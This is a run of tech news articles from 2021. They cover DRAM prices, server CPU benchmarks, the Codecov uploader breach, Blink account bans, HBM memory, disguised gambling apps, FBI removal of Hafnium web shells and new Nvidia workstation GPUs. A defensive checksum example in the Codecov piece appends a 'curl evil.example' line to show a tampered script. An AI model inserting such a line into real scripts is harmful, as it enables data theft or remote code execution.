More bad news for the prospective PC builder comes out of Taiwanese research institute TrendForce, which is predicting a rise in DRAM prices of between 18 and 23% for the second quarter of 2021.
While negotiations between OEMs and resellers are still ongoing, TrendForce is predicting a quarter-on-quarter price increase of 25% on 8GB DDR4 2666MHz modules, higher than expected. DRAM modules continue to be in short supply, partly due to the global chip shortage, and partly thanks to many people buying new machines to work from home during the pandemic. All kinds of RAM are affected, including mobile DRAM, GDDR modules for graphics cards, and server DRAM, which is closely related to home PC RAM and therefore more easily affected by price rises.
The second quarter of the financial year is often the peak season for laptop production, and TrendForce’s figures predict a 7.9% increase in laptop production by major manufacturers this year, which will put more pressure on supplies of RAM and increase the price by 23–28% in 2Q21.
And the worst thing is it’s all likely to carry on this way for some time. Server RAM, under pressure thanks to a boom in cloud computing linked to the pandemic, will see another rise in demand, putting manufacturers in an advantageous position as they negotiate with the AIB makers. The price of server RAM could rise by 25% next quarter, TrendForce forecasts.
AMD’s EPYC Milan processors launched last month with 120 new world records to their credit in various applications, like HPC, cloud, and enterprise workloads. But variants of these chips will eventually come to the market as Threadripper models for high-end desktop PCs, and AMD’s server records don’t tell us too much about what we could expect from the PC chips. However, the company recently broke the Cinebench world record with its Milan chips, giving us an idea of what to expect in rendering work. Just for fun, we also ran a few tests on Intel’s new flagship 40-core Ice Lake Xeon chips to see how they stack up, not only against the new record AMD set with the server chips, but also against a single AMD Threadripper processor.
During the latest episode of AMD’s The Bring Up YouTube video series, the company took two of its $7,890 EPYC Milan 7763 chips for a spin in Cinebench R23, a rendering application that AMD commonly uses for its desktop PC marketing (largely because it responds exceedingly well to AMD’s Zen architectures).
As a quick reminder, AMD’s flagship 7763 server chips come armed with 64 Zen 3 cores and 128 threads apiece and have a 2.45 GHz base and 3.5 GHz boost frequency. All told, we’re looking at a Cinebench run with 128 cores and 256 threads, which you can see in the tweet below:
This is what it looks like when 2x 64 Zen 3 cores chew through Cinebench R23. pic.twitter.com/o9jiZeKPlR (April 15, 2021)
The dual 7763s scored 113,631 points, while the previous world record weighed in at 105,170 (as per HWBot rankings). AMD says it used a reference server design with conventional air cooling for the test run, so there were no special accommodations or overclocking. The system peaked at 85C and 403W during the test run. Here’s AMD’s official HWBot world record submission.
| | 1K Unit Price / RCP | Cores / Threads | Base / Boost – All Core (GHz) | L3 Cache (MB) | TDP (W) |
| --- | --- | --- | --- | --- | --- |
| AMD EPYC Milan 7763 | $7,890 | 64 / 128 | 2.45 / 3.5 | 256 | 280 |
| Intel Xeon Platinum 8380 | $8,099 | 40 / 80 | 2.3 / 3.2 – 3.0 | 60 | 270 |
That isn’t much info to work with, but it’s enough for us to set up our own test. We ran a few tests with the dual Xeon 8380 Ice Lake server we used for our recent review. Much like AMD’s test system, this is a standard development design with air cooling (more details in the review). The Xeon system houses two $8,099 10nm Ice Lake Xeons with 40 cores and 80 threads apiece that operate at a 2.3 GHz base and 3.2 GHz boost frequency. Yes, AMD’s Milan outweighs the Xeon system, but the Ice Lake 8380 is Intel’s highest-end part, and both chips come with comparable pricing.
We’re looking at the EPYC Milan server with 128 cores and 256 threads against the Intel Ice Lake system with 80 cores and 160 threads. Our quick tests here are not 100% like-for-like, so take these with a grain of salt, though we did our best to match AMD’s test conditions. Here are our test results, with a few extras from the HWBot benchmark database mixed in:
| Cinebench Benchmarks | Score | Cooling | Chip Price |
| --- | --- | --- | --- |
| 2x AMD EPYC Milan 7763 | 113,631 | Air | $15,780 |
| 1x Threadripper 3990X (Splave) | 105,170 | Liquid Nitrogen (LN2) | $3,990 |
| 2x EPYC 7H12 | 92,357 | Air | ? |
| 2x Intel Xeon Platinum 8380 | 74,630 | Air | $17,000 |
| 1x Threadripper 3990X (stock) | 64,354 | All-In-One (AIO) Liquid Cooling | $3,990 |
As you can see, in Cinebench R23, the dual EPYC Milan 7763s outscore the dual Ice Lake Xeon 8380s by roughly 52% (put another way, the Xeons trail by 34%). AMD lists a 403W peak power consumption during its tests, but we assume those measurements are for the processors only (and perhaps only a single processor). In contrast, our power measurement at the wall for the Xeon 8380 server weighed in at 1154W, but that includes a beastly 512GB of memory, other platform additives, VRM losses, etc., meaning it’s just a rough idea of power consumption that isn’t comparable to the EPYC system.
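The relative-performance figure depends on which system you treat as the baseline, so it’s worth a quick sanity check against the scores in the table. A minimal calculation, using only the numbers quoted above:

```python
# Relative performance from the Cinebench R23 scores quoted above.
epyc_score = 113_631  # 2x EPYC Milan 7763
xeon_score = 74_630   # 2x Xeon Platinum 8380

# How much faster the EPYC system is, with the Xeon system as baseline.
epyc_lead_pct = (epyc_score / xeon_score - 1) * 100     # ~52%

# How far the Xeon system trails, with the EPYC system as baseline.
xeon_deficit_pct = (1 - xeon_score / epyc_score) * 100  # ~34%

print(f"EPYC lead: {epyc_lead_pct:.1f}%, Xeon deficit: {xeon_deficit_pct:.1f}%")
```

The same scores thus read as either a 52% lead or a 34% deficit, depending on the denominator.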
Naturally, Cinebench R23 results have absolutely no bearing on the purchasing decision for a data center customer, but it is an interesting comparison. Notably, a single Threadripper 3990X, when pressed to its fullest with liquid nitrogen by our resident overclocking guru Splave, still beats the two Xeon Platinum 8380s, though the 8380s pull off the win against an air-cooled 3990X at stock settings (measured in our labs).
Finally, we decided to see how two Ice Lake Xeon 8380s compare against a broader set of processors. Intel suffered quite a bit of embarrassment back at AMD’s launch of the 64-core Threadripper 3990X for high-end desktop PCs, as this $3,990 processor (yes, just one) beat two of Intel’s previous-gen 8280 Xeons in a range of threaded workloads. Intel’s Xeons weighed in at $20,000 total and represented the company’s fastest server processors. Ouch.
In fact, those benchmark results were so amazing that we included an entire page of testing in our Threadripper 3990X review comparing two of Intel’s fire-breathing behemoths to AMD’s single workstation chip, which you can see here. As a bit of a redux, we decided to revisit the standings with a quick run of Cinebench R20 with the new Intel 10nm Xeons. Notably, this test is with an older version of the benchmark than we used above, but that’s so we can match our historical data in the chart below:
Unfortunately, we don’t have a dual-socket EPYC Milan 7763 system to add to our historical test results here, but we get a good enough sense of Ice Lake’s relative positioning with this chart. The two Intel Ice Lake 8380s, which weigh in at $17,000, beat the single $3,990 Threadripper 3990X at stock settings. That’s at least better than the dual 8280s that lost so convincingly in the past.
However, a quick toggle of the PBO switch, an automated overclocking feature from AMD that works with standard cooling solutions (no liquid nitrogen required), allows a single Threadripper 3990X to regain the lead over Intel’s newest 10nm flagships in this test. Intel’s latest chips also can’t beat AMD’s previous-gen EPYC Rome 7742s, which are 64-core chips.
Of course, this single benchmark has almost no bearing on the enterprise market that the Ice Lake chips are destined for, and the latest Xeons do make solid steps forward in a broader range of tests that do matter, which you can see in our Ice Lake 8380 review.
Federal officials are investigating a security breach at software auditing company Codecov, which apparently went undetected for months, Reuters reported. Codecov’s platform is used to test software code for vulnerabilities, and its 29,000 clients include Atlassian, Procter & Gamble, GoDaddy, and the Washington Post.
In a statement on the company’s website, Codecov CEO Jerrod Engelberg acknowledged the breach and the federal investigation, saying someone had gained access to its Bash Uploader script and modified it without the company’s permission.
“Our investigation has determined that beginning January 31, 2021, there were periodic, unauthorized alterations of our Bash Uploader script by a third party, which enabled them to potentially export information stored in our users’ continuous integration (CI) environments,” Engelberg wrote. “This information was then sent to a third-party server outside of Codecov’s infrastructure.”
According to Engelberg’s post, the modified version of the tool could have affected:
Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
Although the breach occurred in January, it was not discovered until April 1st, when a customer noticed something was wrong with the tool. “Immediately upon becoming aware of the issue, Codecov secured and remediated the potentially affected script and began investigating the extent to which users may have been impacted,” Engelberg wrote.
Codecov does not know who was responsible for the hack, but has hired a third-party forensics company to help it determine how users were affected, and reported the matter to law enforcement. The company emailed affected users, who Codecov did not name, to notify them.
“We strongly recommend affected users immediately re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders,” Engelberg added.
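For CI pipelines that fetch an uploader script at build time, the underlying lesson generalizes: verify what you run before running it. Here is a minimal sketch of digest pinning; the script contents and digest below are illustrative stand-ins, not Codecov’s actual tooling:

```python
# Illustrative only: one common mitigation for this class of supply-chain
# attack is to pin a downloaded CI script to a known-good SHA-256 digest
# instead of executing whatever the server currently serves.
import hashlib

def is_untampered(script_bytes: bytes, expected_sha256: str) -> bool:
    """Return True only if the downloaded script matches the published digest."""
    return hashlib.sha256(script_bytes).hexdigest() == expected_sha256

script = b"#!/bin/bash\necho upload-coverage\n"  # pretend this was downloaded
pinned = hashlib.sha256(script).hexdigest()      # normally published out-of-band

print(is_untampered(script, pinned))                           # clean copy: True
print(is_untampered(script + b"curl evil.example\n", pinned))  # modified copy: False
```

With a check like this in place, the kind of "periodic, unauthorized alterations" Engelberg describes would fail the comparison and never execute.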
While the breadth of the Codecov breach remains unclear, Reuters notes that it could have a far-reaching impact similar to that of the SolarWinds hack of late last year. In that breach, hackers associated with the Russian government compromised SolarWinds’ monitoring and management software. Some 250 entities are believed to have been affected by the SolarWinds breach, including Nvidia, Cisco, and Belkin. The US Treasury, Commerce, State, Energy, and Homeland Security agencies were also affected.
Blink, the Kickstarter success bought by Amazon in 2017, has long been synonymous with inexpensive battery-powered home video cameras that don’t require a monthly contract for cloud recordings. Open-source projects like Homebridge, Home Assistant, and HOOBS have made the cameras even more extensible by allowing Blink’s temperature and motion sensors to work with smart home platforms like HomeKit and act as triggers for various automations. This combination of price and functionality led many smart home enthusiasts to buy Blink cameras in bulk for whole-home monitoring, especially those who don’t want to be beholden to a corporate overlord (and its requisite subscription fees). But instead of embracing its most passionate fans, Amazon has turned against them, threatening to terminate Blink accounts while challenging the very concept of ownership.
To set the stage, I recently set up a Raspberry Pi running Homebridge with the goal of creating a single iPhone dashboard to tie my smart home together. I started automating my home about 12 years ago, long before you could buy into complete ecosystems from Amazon, Google, and Apple. Now it’s a devil’s brew of Z-Wave and Zigbee devices, some controllable with Siri, some with Alexa, and a few with Google Assistant. It’s held together with a smattering of IFTTT recipes and four disparate hubs from Ikea, Aqara, Philips Hue, and Vera. It works, kind of, but requires several different apps, many interfaces, and lots of patience, especially from my family.
Over most of a weekend, I was able to configure Homebridge to link every one of my 50+ smart devices to HomeKit and each other in the Apple Home app. This allowed me to create rules that were previously impossible, like using the Blink XT camera’s motion sensor in my garden to trigger a Z-Wave siren and Hue lightbulbs at night. Nerdvana unlocked!
My sense of delight and intense pride lasted exactly one week before my Blink cameras suddenly went dead. The reason was delivered in an email from Amazon the next morning:
“My name is Tori and I am with the Blink team. While doing a routine server audit, your account was flagged and subsequently disabled due to unsupported scripts or apps running on your system. The only automation that is permitted for use with the Blink system is through Alexa and/or IFTTT. Please disable these scripts or apps and reach back out to me so that I can re-enable your account.”
After a brief WTF exchange whereby I explained that Alexa and / or IFTTT are wholly inferior to the capabilities of Homebridge, Tori helpfully directed me to the exact paragraph of the Blink Terms of Service that I had violated. Terms which, admittedly, I was now reading for the first time (emphasis mine):
“We may terminate the Agreement or restrict, suspend, or terminate your use of Blink Services at our discretion without notice at any time, including if we determine that your use violates the Agreement, is improper, substantially exceeds or differs from normal use by other users, or otherwise involves fraud or misuse of Blink Services or harms our interests or those of another user of Blink Services. If your use of Blink Services is restricted, suspended, or terminated, you may be unable to access your video clips and you will not receive any refund or any other compensation. In case of termination, Blink may immediately revoke your access to Blink Services without refund.”
It turns out that Amazon’s crackdown on Blink automators has been a known issue in the community for at least a year. My question is: why does Amazon bother?
My Homebridge integration may well be in violation of Blink’s terms and conditions, even if the terms seem unduly restrictive. But why is Amazon, owner of those massive AWS server farms that earned nearly $50 billion in 2020, resorting to such draconian measures in response to my meager deployment of five Blink cameras? I could see a crackdown on large-scale corporate installations hammering away at the Blink API, but why me and other small-time enthusiasts?
According to Colin Bendell, developer of the Blink camera plugin for Homebridge, there are at most 4,000 homes using open-source plugins like his. “Even if we round up to 10,000 users, I think this is probably small potatoes for Amazon,” says Bendell, who should know. Not only did he reverse engineer the Blink app to mimic its behavior, but the O’Reilly author and self-proclaimed IoT hobbyist is also the director of performance engineering at Shopify.
Blink could easily look the other way for small home deployments like mine without waiving its rights. It says so right in the T&Cs it sent me:
“Blink’s failure to insist upon or enforce your strict compliance with this Agreement will not constitute a waiver of any of its rights.”
But that’d be a cop-out. Really, Amazon should be embracing Blink hobbyists. Homebridge is, after all, a project that extends Apple HomeKit to work with a wide variety of uncertified devices, including cameras and doorbells from Amazon-owned Ring. And study after study has concluded that Apple device owners love to spend money. Surely this is a community Amazon should encourage, not vilify.
At the risk of saying too much (please don’t shut me down, Amazon!), why is it that my two Ring cameras aren’t raising any red flags during “server audits”? I certainly check them more frequently as one is my doorbell. Perhaps it’s because I already pay a monthly subscription to Amazon for Ring and pay nothing to Blink. (Although sadly, even that early benefit has come to an end. As of March 18th, Amazon requires owners of newer Blink cameras to pay a subscription fee to unlock every feature.)
When I reached out to Amazon with the questions I raise above, and asked if enthusiast initiatives like Homebridge would be officially (or unofficially, wink) supported, I was given this boilerplate response:
“Blink customers can control their cameras through the Blink Home Monitor app, and customize their experience using the If This Then That (IFTTT) service. We are always looking for ways to improve the customer experience, including supporting select third-party integrations for our devices.”
Gee, thanks.
We kid ourselves about ownership all the time. I say I own my house, but, in fact, the bank owns more of it than I do. I listen to my music on Spotify, but those Premium playlists I’ve so carefully curated for years will be plucked from my phone just as soon as payments lapse. But somehow, Blink cameras were supposed to be different. They were for people drawn to Blink on the strength of that “no monthly contract” pitch. These were devices you were supposed to own without limitations or tithes.
How things have changed.
In 2017, Blink stood alone in the field; today there’s Wyze, Eufy, TP-Link / Kasa, Imou, and Ezviz to name just a few of the companies making inexpensive wired and wireless cameras for every smart home ecosystem, including Amazon’s, often with better features and value.
I’ve been a smart home evangelist for more than a decade, doling out advice to friends, often solicited, often not. Blink used to be an easy pitch: cheap and dead simple to install for normies, and highly extensible if you’re willing to put in the effort. But Amazon’s heavy-handed enforcement of its T&Cs, alongside the introduction of subscription fees, has negated any advantage Blink once held over its camera competitors. While Blink sales will undoubtedly benefit from Amazon’s promotion machine, longtime Blink enthusiasts like me will be taking our allegiances elsewhere.
HBM stands for high bandwidth memory, a type of memory interface used with 3D-stacked DRAM (dynamic random access memory) in some AMD GPUs (aka graphics cards), as well as in the server, high-performance computing (HPC), networking, and client spaces. Samsung and SK Hynix make HBM chips.
Ultimately, HBM is meant to offer much higher bandwidth and lower power consumption than the GDDR memory used in most of today’s best graphics cards for gaming.
| HBM Specs | HBM2 / HBM2E (Current) | HBM | HBM3 (Upcoming) |
| --- | --- | --- | --- |
| Max Pin Transfer Rate | 3.2 Gbps | 1 Gbps | ? |
| Max Capacity | 24GB | 4GB | 64GB |
| Max Bandwidth | 410 GBps | 128 GBps | 512 GBps |
HBM technology works by vertically stacking memory chips on top of one another in order to shorten how far data has to travel, while allowing for smaller form factors. Additionally, with two 128-bit channels per die, HBM’s memory bus is much wider than that of other types of DRAM memory.
Stacked memory chips are connected by through-silicon vias (TSVs) and microbumps, and they connect to the GPU through an interposer rather than being integrated on-chip.
HBM2 and HBM2E
HBM2 debuted in 2016, and in December 2018, JEDEC updated the HBM2 standard. The updated standard was commonly referred to as both HBM2 and HBM2E (to denote the deviation from the original HBM2 standard). However, the spec was updated again in early 2020, and the name “HBM2E” wasn’t formally included. Still, you may see people and/or companies refer to HBM2 as HBM2E, or even HBMnext, thanks to Micron.
The current HBM2 standard allows for a transfer rate of 3.2 Gbps per pin, a max capacity of 24GB per stack (2GB per die across 12 dies per stack), and a max bandwidth of 410 GBps, delivered across a 1,024-bit memory interface split into 8 independent channels on each stack.
Originally, HBM2 was specced for a max transfer rate of 2 Gbps per pin, a max capacity of 8GB per stack (1GB max die capacity across 8 dies per stack), and a max bandwidth of 256 GBps. It was then bumped to 2.4 Gbps per pin, a max capacity of 24GB (2GB per die across 12 dies per stack), and a 307 GBps max bandwidth before reaching the standard we see today.
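Those per-stack bandwidth figures follow directly from the pin rate and the 1,024-bit interface. A quick sketch of the arithmetic, where bandwidth per stack equals the pin rate in Gbps times the bus width in bits, divided by 8 bits per byte:

```python
# Per-stack HBM bandwidth from the per-pin transfer rate and bus width.
def hbm_stack_bandwidth_gbps(pin_rate_gbps: float, bus_width_bits: int = 1024) -> float:
    """Per-stack bandwidth in GB/s: pin rate (Gbps) x pins, converted bits -> bytes."""
    return pin_rate_gbps * bus_width_bits / 8

print(hbm_stack_bandwidth_gbps(2.0))  # original HBM2 spec: 256.0 GB/s
print(hbm_stack_bandwidth_gbps(2.4))  # first revision:     307.2 GB/s (~307)
print(hbm_stack_bandwidth_gbps(3.2))  # current spec:       409.6 GB/s (~410)
```

The published 256, 307, and 410 GBps figures are simply these products, rounded.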
HBM3
While not yet available, the HBM3 standard is currently in discussion and being standardized by JEDEC.
According to an Ars Technica report, HBM3 is expected to support up to 64GB capacities and a bandwidth of up to 512 GBps. In 2019, Jeongdong Choe, an analyst at TechInsights, pointed to HBM3 supporting 4 Gbps transfer rates in an interview with Semiconductor Engineering. HBM3 will also reportedly deliver more dies per stack and more than two times the density per die with a similar power budget. In a 2020 blog post, Cadence reported that the spec will use a 512-bit bus with higher clocks, allowing HBM3 to “achieve the same higher bandwidth with much lower cost by not requiring a silicon interposer.”
We don’t know the release date of HBM3 yet; however, this April we saw SiFive tape out a system-on-chip (SoC) with HBM3.
This article is part of the Tom’s Hardware Glossary.
In popular culture, access to an illicit gambling den is as easy as stumbling into the right shop and saying the password — or greasing some palms. Apple’s App Store apparently has a real-life parallel: today, app developer Kosta Eleftheriou discovered a terrible kiddie game that’s actually a front for gambling websites.
The secret password isn’t one you’d be likely to guess: you have to be in the right country — or pretend to be in the right country using a VPN.
But then, instead of launching an ugly monkey-flipping endless runner game filled with typos and bugs, the very same app launches a casino experience:
This @AppStore app pretends to be a silly platformer game for children 4+, but if I set my VPN to Turkey and relaunch it becomes an online casino that doesn’t even use Apple’s IAP.
pic.twitter.com/crnOOF0pNi
— Kosta Eleftheriou (@keleftheriou) April 15, 2021
The app, “Jungle Runner 2k21,” has already disappeared from the App Store, presumably thanks to publicity from Gizmodo and Daring Fireball, who each wrote about Eleftheriou’s finding earlier today.
It’s not the only one, though: the same developer, “Colin Malachi,” had another incredibly basic game on the App Store called “Magical Forest – Puzzle” that was also a front for gambling. I tried them both myself, and here’s some visual evidence:
Here’s what Magical Forest looked like when you opened it from the United States:
To see the casinos, I accessed the apps from a VPN server in Turkey. While Daring Fireball notes that users in other non-US countries like Italy also seem to have been able to access the gambling sites, I tried a number of other locations, including Italy, without success.
Unlike the multi-million dollar App Store scams that Eleftheriou uncovered earlier this year, it’s not hard to see why Apple’s App Store review program might have missed these — they largely look like your typical shovelware if you don’t know the trick, with only a handful of tells… like the fact that Jungle Runner uses a Pastebin for its privacy policies:
It’s not necessarily clear to me that they’d be violating very many of Apple’s App Store policies, either. Gambling apps are permitted by Apple, as long as they’re geo-restricted to regions where that gambling is permitted by law, and you could maybe argue that’s exactly what this developer did by checking your IP address. But I imagine Cupertino would frown on a gambling app masquerading as a kid’s game either way — and Eleftheriou suggests the gambling sites may be scamming people out of money, too.
As an icing on the cake, people in the reviews say that they deposited large sums for the promise of a bonus, but they never received the promised payouts.
Surprising no one, the scammers aren’t even operating a fair casino.
— Kosta Eleftheriou (@keleftheriou) April 15, 2021
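The geo-gating trick at the heart of all this is trivial to implement. A minimal sketch of how such an app might pick which experience to present, keyed off the GeoIP country derived from the caller’s IP address (names and logic here are illustrative assumptions, not the developer’s actual code):

```python
# Hypothetical illustration of IP-based geo-gating, as described in the report.
GAMBLING_COUNTRIES = {"TR"}  # assumption: gated to Turkey, per Eleftheriou's finding

def experience_for(country_code: str) -> str:
    """Pick which UI to show for a given two-letter GeoIP country code."""
    if country_code in GAMBLING_COUNTRIES:
        return "casino"      # the hidden gambling experience
    return "platformer"      # the innocuous kids' game

print(experience_for("US"))  # platformer
print(experience_for("TR"))  # casino
```

A reviewer testing from a US IP address would only ever see the platformer branch, which is exactly why this sort of gate is so hard for App Review to catch.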
Apple didn’t immediately reply to a request for comment.
Parallels has released a new version of its Parallels Desktop for Mac virtualization software that features full native support for Mac computers equipped with either Apple M1 or Intel processors. The program allows users to run Windows 10 Arm Insider Preview as well as various Linux distributions on systems running the M1 SoC at native speeds.
Running Windows on Apple’s Mac computers may not be a priority for most of their owners, but there are still quite a lot of users who need to run Windows applications from time to time. Since the latest Apple MacBook Air/Pro 13 and Mac mini are based on the Arm-powered M1 SoC, it’s impossible to install regular Windows 10 as a second OS on them. Furthermore, unlike other Mac programs, virtual machines did not run well on M1-based Macs via the Rosetta translation layer, so Parallels had to redesign Parallels Desktop to run natively on Apple’s M1 SoC.
Parallels Desktop for Mac 16.5 supports all the capabilities that users of the software are used to on Apple M1 systems, including Coherence mode, shared profiles, and Touch Bar controls, just to name a few.
In addition to Windows 10 on Arm, Parallels Desktop for Mac 16.5 also supports guest operating systems on M1 Macs, including the Linux distributions Ubuntu 20.04, Kali Linux 2021.1, Debian 10.7, and Fedora Workstation 33-1.2.
To ensure flawless operation of its virtual machine software, Parallels enlisted the help of more than 100,000 M1 Mac users, who ran Microsoft’s Windows 10 on Arm Insider Preview along with various software, from Power BI to Visual Studio and from SQL Server to MetaTrader. In addition, Parallels’ engineers did not forget about games, ensuring that titles like Rocket League, Among Us, Roblox, The Elder Scrolls V: Skyrim, and Sam & Max Save the World worked well on Parallels Desktop for Mac 16.5 and Apple M1-powered systems.
Right now, Parallels Desktop for Mac 16.5 is good enough to launch commercially, according to the company.
There are some interesting findings about performance of Apple M1 and Parallels Desktop 16.5 for Mac:
An M1-based Mac running Parallels Desktop 16.5 and Windows 10 Arm consumes 2.5 times less energy than a 2020 Intel-based MacBook Air.
An Apple M1 machine running Parallels Desktop 16.5 and Windows 10 Arm performs 30% better in Geekbench 5 than a MacBook Pro with an Intel Core i9-8950HK under the same conditions.
Apple M1’s integrated GPU appears to be 60% faster than AMD’s Radeon Pro 555X discrete graphics processor in DirectX 11 applications when running Windows using the Parallels Desktop 16.5.
“Apple’s M1 chip is a significant breakthrough for Mac users,” said Nick Dobrovolskiy, Parallels Senior Vice President of Engineering and Support. “The transition has been smooth for most Mac applications, thanks to Rosetta technology. However, virtual machines are an exception and thus Parallels engineers implemented native virtualization support for the Mac with M1 chip. This enables our users to enjoy the best Windows-on-Mac experience available.”
The Overwatch League kicks off its fourth season this week, and while the majority of matches will be played remotely, today the league announced plans to hold multiple live events in China.
There will be three events spread across three cities — Hangzhou in June, Shanghai in July, and Guangzhou in August — and the league says they will take place in venues with reduced capacity “in order to comply with local safety requirements.” The events will be something of a hybrid between online and in-person competition. Here’s how OWL describes it:
The five China-based teams — Hunters, Charge, Spark, Valiant, and Dragons — plan to travel to each of the events to compete onstage, while the three Korea-based teams — NYXL, Fusion, and Dynasty — are not expected to travel. Matches taking place between a China-based team and a Korea-based team will feature the Chinese team competing onstage while their opponent competes from Korea remotely on our cloud tournament server.
Like most esports leagues, OWL was forced to pivot last year to online competition due to the ongoing pandemic; even the championship match featured pro teams playing remotely. The change was particularly big for OWL, as the league — which features 20 squads based in 19 cities across North America, Europe, and Asia — was preparing for its first season where teams would play matches in home venues. While the majority of the 2021 season is still expected to take place remotely, today’s news is an important step for OWL getting back to its original goal.
The Overwatch League’s 2021 season begins on April 16th, with a huge slate of matches throughout the weekend.
In what’s believed to be an unprecedented move, the FBI is trying to protect hundreds of computers infected by the Hafnium hack by hacking them itself, using the original hackers’ own tools (via TechCrunch).
The hack, which affected tens of thousands of Microsoft Exchange Server customers around the world and triggered a “whole of government response” from the White House, reportedly left a number of backdoors that could let any number of hackers right into those systems again. Now, the FBI has taken advantage of this by using those same web shells / backdoors to remotely delete themselves, an operation that the agency is calling a success.
“The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),” explains the US Justice Department.
The wild part here is that owners of these Microsoft Exchange Servers likely aren’t yet aware of the FBI’s involvement; the Justice Department says it’s merely “attempting to provide notice” to owners that they attempted to assist. It’s doing all this with the full approval of a Texas court, according to the agency. You can read the unsealed search and seizure warrant and application right here.
It’ll be interesting to see if this sets a precedent for future responses to major hacks like Hafnium. While I’m personally undecided, it’s easy to argue that the FBI is doing the world a service by removing a threat like this — while Microsoft may have been painfully slow with its initial response, Microsoft Exchange Server customers have also now had well over a month to patch their own servers after several critical alerts. I wonder how many customers will be angry, and how many grateful that the FBI, not some other hacker, took advantage of the open door. We know that critical-but-local government infrastructure often has egregious security practices, most recently resulting in two local drinking water supplies being tampered with.
The FBI says that thousands of systems were patched by their owners before it began its remote Hafnium backdoor removal operation, and that it only “removed one early hacking group’s remaining web shells which could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.”
“Today’s court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” reads a statement from Assistant Attorney General John C. Demers, with the Justice Department’s National Security Division.
Today is Patch Tuesday, by the way, and Microsoft’s April 2021 security update includes new mitigations for Exchange Server vulnerabilities, according to CISA. If you’re running a local Exchange Server or know someone who is, take a look.
Now that Intel has finally launched its 3rd Generation Xeon Scalable ‘Ice Lake’ processors for servers, it is only a matter of time before the company releases its Xeon W-series CPUs featuring the same architecture for workstations. Apparently, some of these upcoming processors are already in the wild, being evaluated by workstation vendors.
Puget Systems recently built a system based on the yet-to-be-announced Intel Xeon W-3335 processor clocked at 3.40 GHz using Gigabyte’s single-socket MU72-SU0 motherboard, 128 GB of DDR4 memory (using eight 16GB modules), and Nvidia’s Quadro RTX 4000 graphics card. Exact specifications of the CPU are unknown, but given its ‘3335’ model number, we’d speculate that this is an entry-level model. The workstation vendor is obviously evaluating the new Ice Lake workstation platform from every angle, and it has published a benchmark result of the machine in its PugetBench for Premiere Pro 0.95.1.
The Intel Xeon W-3335-based system scored 926 overall points (standard export: 88.2; standard live playback: 126.1; effects: 63.6; GPU score: 63.6). For comparison, a system powered by AMD's 12-core Ryzen 9 5900X equipped with 16GB of RAM and a GeForce RTX 3080 scored 915 overall points (standard export: 100.9; standard live playback: 79.6; effects: 93.9; GPU score: 100.7).
Given that we do not know the exact specifications of the Intel Xeon W-3335 CPU, it is hard to draw any conclusions about its performance, especially keeping in mind that platform drivers may not yet be ready for Ice Lake-W. Still, we can at least make some ballpark assumptions about the CPU's performance.
Intel has not disclosed what to expect from its Xeon W-series 'Ice Lake' processors, but in general the company tends to offer key features of its server products to its workstation customers as well. In the case of the Xeon W-3335, it is evident that the CPU retains an eight-channel memory subsystem, though we do not know anything about the number of PCIe lanes it supports.
In any case, since workstation vendors are already testing the new Xeon-W CPUs, expect them to hit the market shortly.
Nvidia this week introduced a host of professional graphics solutions for desktops and laptops, which carry the Nvidia RTX A-series monikers and do not use the Quadro branding. The majority of the new units are based on the Ampere architecture and therefore bring the latest features along with drivers certified by developers of professional software.
Nvidia started rolling out its Ampere architecture to the professional market last October, when it announced the Nvidia RTX A6000 graphics card based on the GA102 GPU with 10,752 CUDA cores and 48GB of memory. The graphics board costs $4,650 and is naturally aimed at high-end workstations that cost well over $10,000. To address market segments with different needs, Nvidia this week introduced its RTX A5000 and RTX A4000 professional graphics cards.
The Nvidia RTX A5000 sits below the RTX A6000 but has the exact same feature set, including support for 2-way multi-GPU configurations using NVLink as well as GPU virtualization, so it can be installed into a server and used remotely by several clients (or used in regular desktop machines). The RTX A5000 is based on the GA102 GPU and is equipped with 24GB of GDDR6 memory with ECC. It peaks at 27.8 FP32 TFLOPS, nearly 30% below the RTX A6000's 38.7 FP32 TFLOPS, so it likely has far fewer CUDA cores. The board has four DisplayPort 1.4a outputs and comes with a dual-slot blower-type cooler.
Next up is the Nvidia RTX A4000, which is based on the GA104 and carries 16GB of GDDR6 memory with ECC. The product tops out at 19.2 FP32 TFLOPS and is designed squarely for traditional single-user workstations. In keeping with the trend toward smaller systems, the RTX A4000 uses a single-slot blower-type cooling system.
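The FP32 figures quoted here follow the standard GPU throughput formula: peak TFLOPS = CUDA cores x 2 FLOPs per clock (one fused multiply-add) x boost clock. As a rough sketch using only the numbers in this article (the derived clock and core count are our estimates, not official specs):

```python
# Peak FP32 throughput = CUDA cores * 2 FLOPs per clock (one FMA) * boost clock.
def fp32_tflops(cuda_cores: int, boost_ghz: float) -> float:
    return cuda_cores * 2 * boost_ghz / 1000  # cores * GFLOPS per core -> TFLOPS

# The RTX A6000's 10,752 cores and 38.7 TFLOPS are both quoted in this article,
# so we can back out the implied boost clock (an estimate, not an official spec).
implied_boost_ghz = 38.7 * 1000 / (10752 * 2)
print(f"Implied A6000 boost clock: {implied_boost_ghz:.2f} GHz")  # ~1.80 GHz

# Assuming a similar clock for the GA102-based RTX A5000, its 27.8 TFLOPS
# would imply a core count in this ballpark; the real part could instead
# pair more cores with a lower clock.
estimated_a5000_cores = 27.8 * 1000 / (2 * implied_boost_ghz)
print(f"Estimated A5000 CUDA cores: {estimated_a5000_cores:.0f}")
```

This is only a back-of-the-envelope check, but it shows why the 30% TFLOPS gap points to a substantially cut-down GA102 configuration.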
Nvidia plans to start shipments of the new RTX A-series professional graphics cards later this month, so expect them in new workstations in May or June.
Mobile Workstations Get Amperes and Some Turings
In addition to new graphics cards for desktop workstations, Nvidia also rolled out a lineup of mobile Nvidia RTX A-series GPUs that includes four solutions: the RTX A5000 and RTX A4000 based on the GA104 silicon (just like the RTX 3070/RTX 3080 for laptops), the RTX A3000, as well as the RTX A2000 based on the GA106 chip (like the RTX 3060 for laptops).
